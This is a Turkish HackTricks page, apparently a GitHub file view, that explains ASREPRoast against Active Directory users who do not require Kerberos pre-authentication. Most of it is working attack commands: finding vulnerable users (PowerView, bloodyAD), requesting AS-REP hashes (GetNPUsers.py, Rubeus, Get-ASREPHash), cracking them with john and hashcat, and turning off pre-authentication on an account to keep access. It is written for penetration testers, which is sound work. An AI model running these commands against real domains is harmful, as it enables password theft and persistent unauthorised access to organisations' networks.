hacktricks/windows-hardening/active-directory-methodology/asreproast.md
2024-02-10 18:14:16 +00:00

7.1 KiB
Raw Blame History

ASREPRoast

AWS hackleme becerilerinizi sıfırdan ileri seviyeye taşıyın htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile!

HackTricks'ı desteklemenin diğer yolları:

Deneyimli hackerlar ve ödül avcılarıyla iletişim kurmak için HackenProof Discord sunucusuna katılın!

Hacking İçgörüleri
Hacking'in heyecanına ve zorluklarına dalmış içeriklerle etkileşim kurun

Gerçek Zamanlı Hack Haberleri
Hızlı tempolu hacking dünyasını gerçek zamanlı haberler ve içgörülerle takip edin

En Son Duyurular
Yeni ödül avcılarının başlatıldığı ve önemli platform güncellemelerinin olduğu en son duyurularla bilgilenin

Bize katılın Discord ve bugün en iyi hackerlarla işbirliği yapmaya başlayın!

ASREPRoast

ASREPRoast, Kerberos ön kimlik doğrulama gerekliliği olmayan kullanıcıları hedef alan bir güvenlik saldırısıdır. Temel olarak, bu zafiyet saldırganlara kullanıcının şifresine ihtiyaç duymadan Domain Controller (DC) üzerinden kullanıcının kimlik doğrulamasını isteme imkanı sağlar. DC daha sonra kullanıcının şifreden türetilen anahtarla şifrelenmiş bir mesajla yanıt verir ve saldırganlar bu mesajı çevrimdışı olarak kırarak kullanıcının şifresini keşfetmeye çalışabilir.

Bu saldırı için temel gereksinimler şunlardır:

  • Kerberos ön kimlik doğrulama gerekliliğinin olmaması: Hedef kullanıcıların bu güvenlik özelliğinin etkin olmaması gerekmektedir.
  • Domain Controller (DC) ile bağlantı: Saldırganların istek göndermek ve şifrelenmiş mesajları almak için DC'ye erişime ihtiyacı vardır.
  • İsteğe bağlı etki alanı hesabı: Bir etki alanı hesabı, saldırganların LDAP sorguları aracılığıyla daha verimli bir şekilde zafiyete açık kullanıcıları belirlemesine olanak tanır. Böyle bir hesap olmadan saldırganlar kullanıcı adlarını tahmin etmek zorundadır.

Zafiyete açık kullanıcıları sıralama (etki alanı kimlik bilgilerine ihtiyaç duyar)

{% code title="Windows kullanarak" %}

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

{% code title="Linux Kullanarak" %}

bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName

{% endcode %}

AS_REP mesajı isteği

{% code title="Linux kullanarak" %}

#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

{% code title="Windows Kullanımı" %}

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

{% endcode %}

{% hint style="warning" %} Rubeus ile AS-REP Roasting yapmak, şifreleme türü 0x17 ve ön kimlik doğrulama türü 0 olan bir 4768 oluşturacaktır. {% endhint %}

Kırma

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Kalıcılık

GenericAll izinlerine (veya özellik yazma izinlerine) sahip olduğunuz bir kullanıcı için preauth zorunlu değilse:

{% code title="Windows kullanarak" %}

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

{% code title="Linux Kullanarak" %}

bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH

{% endcode %}

Referanslar


Deneyimli hackerlar ve ödül avcıları ile iletişim kurmak için HackenProof Discord sunucusuna katılın!

Hacking İçgörüleri
Hacking'in heyecanına ve zorluklarına dalmış içeriklerle etkileşim kurun

Gerçek Zamanlı Hack Haberleri
Hızlı tempolu hacking dünyasını gerçek zamanlı haberler ve içgörülerle takip edin

En Son Duyurular
Yeni ödül avları başlatma ve önemli platform güncellemeleri hakkında bilgi edinin

Bize Discord katılın ve bugün en iyi hackerlarla işbirliği yapmaya başlayın!

Sıfırdan kahraman olmak için AWS hackleme öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'i desteklemenin diğer yolları: